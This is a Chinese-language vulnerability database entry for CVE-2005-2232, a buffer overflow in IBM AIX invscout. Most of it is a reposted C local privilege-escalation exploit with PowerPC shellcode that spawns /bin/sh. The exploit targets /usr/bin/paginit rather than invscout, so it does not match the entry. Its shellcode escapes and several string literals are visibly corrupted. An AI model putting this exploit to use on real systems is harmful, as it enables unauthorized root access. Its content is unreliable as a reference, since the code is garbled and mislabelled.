IBM AIX invscout 缓冲区溢出漏洞

IBM AIX invscout 缓冲区溢出漏洞

漏洞ID 1108858 漏洞类型 缓冲区溢出
发布时间 2005-06-14 更新时间 2005-10-20
图片[1]-IBM AIX invscout 缓冲区溢出漏洞-安全小百科CVE编号 CVE-2005-2232
图片[2]-IBM AIX invscout 缓冲区溢出漏洞-安全小百科CNNVD-ID CNNVD-200507-149
漏洞平台 AIX CVSS评分 4.6
|漏洞来源
https://www.exploit-db.com/exploits/1046
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200507-149
|漏洞详情
IBMAIX是一款商业性质的UNIX操作系统。IBMAIX5.1.0至5.3.0中的invscout存在缓冲区溢出漏洞。本地用户可通过较长的命令行参数,利用此漏洞执行任意代码。
|漏洞EXP
/*
 *
 *    IBM AIX paginit root exploit
 *
 *    I just wanted to play with PowerPC (Tested on 5.2)
 *
 *    intropy (intropy <at> caughq.org)
 *
 */

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>

#define DEBUG 1
#define BUFFERSIZE 8000
#define EGGSIZE 4003

#define NOP 0x60
#define ADDRESS 0x2ff22fff-EGGSIZE

/* lsd */
char shellcode_binsh[] =
"x7cxa5x2ax79"     /* xor.    r5,r5,r5             */
"x40x82xffxfd"     /* bnel    <shellcode>          */
"x7fxe8x02xa6"     /* mflr    r31                  */
"x3bxffx01x20"     /* cal     r31,0x120(r31)       */
"x38x7fxffx08"     /* cal     r3,-248(r31)         */
"x38x9fxffx10"     /* cal     r4,-240(r31)         */
"x90x7fxffx10"     /* st      r3,-240(r31)         */
"x90xbfxffx14"     /* st      r5,-236(r31)         */
"x88x5fxffx0f"     /* lbz     r2,-241(r31)         */
"x98xbfxffx0f"     /* stb     r5,-241(r31)         */
"x4cxc6x33x42"     /* crorc   cr6,cr6,cr6          */
"x44xffxffx02"     /* svca                         */
"/bin/sh"
"x05";

unsigned long cex_load_environment(char *env_buffer, char *address_buffer, char *payload, int environment_size, int buffer_size) {
        int count, env_size = strlen(payload) + environment_size + 4 + 1;
        unsigned long address, *ret_addressp;
        
        if (DEBUG) printf("Adding nops to environment buffer...");
        for ( count = 0; count < env_size - strlen(payload) - 1; count++ ) {
            *(env_buffer++) = NOP;
        }
        if (DEBUG) printf("size %d...n", count);
        if (DEBUG) printf("Adding payload to environment buffer...");
        for ( count = 0; count < strlen(payload); count++ ) {
            *(env_buffer++) = payload[count];
        }
        if (DEBUG) printf("size %d...n", count);

        env_buffer[env_size - 1] = '';

        memcpy(env_buffer, "CAU=", 4);

	memset(address_buffer, 'A', buffer_size);

        address = ADDRESS;

        if (DEBUG) printf("Going for address @ 0x%lxn", address);

        if (DEBUG) printf("Adding return address to buffer...");
        ret_addressp = (unsigned long *)(address_buffer+2);
        for ( count = 0; count < buffer_size; count += 4) {
                *(ret_addressp++) = address;
        }
        if (DEBUG) printf("size %d...n", count);

        address_buffer[buffer_size - 1] = '';

        return( 0 );
}

int main()
{
    char *buffer, *egg;
    char *args[3], *envs[2];

    buffer = (char *)malloc(BUFFERSIZE);
    egg = (char *)malloc(EGGSIZE);

    cex_load_environment(egg, buffer, (char *)&shellcode_binsh, EGGSIZE, BUFFERSIZE);

    args[0] = "/usr/bin/paginit";
    args[1] = buffer;
    args[2] = NULL;

    envs[0] = egg;
    envs[1] = NULL;

    execve( "/usr/bin/paginit", args, envs );

    return( 0 );
}

// milw0rm.com [2005-06-14]
|参考资料

来源:BID
名称:13909
链接:http://www.securityfocus.com/bid/13909
来源:SECUNIA
名称:15636
链接:http://secunia.com/advisories/15636
来源:www.securityfocus.com
链接:http://www.securityfocus.com/advisories/8816
来源:MISC
链接:http://www.caughq.org/advisories/CAU-2005-0002.txt
来源:SECTRACK
名称:1014132
链接:http://securitytracker.com/id?1014132

相关推荐: BaSoMail Server Plaintext Password Vulnerability

BaSoMail Server Plaintext Password Vulnerability 漏洞ID 1100181 漏洞类型 Design Error 发布时间 2003-05-28 更新时间 2003-05-28 CVE编号 N/A CNNVD-ID…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享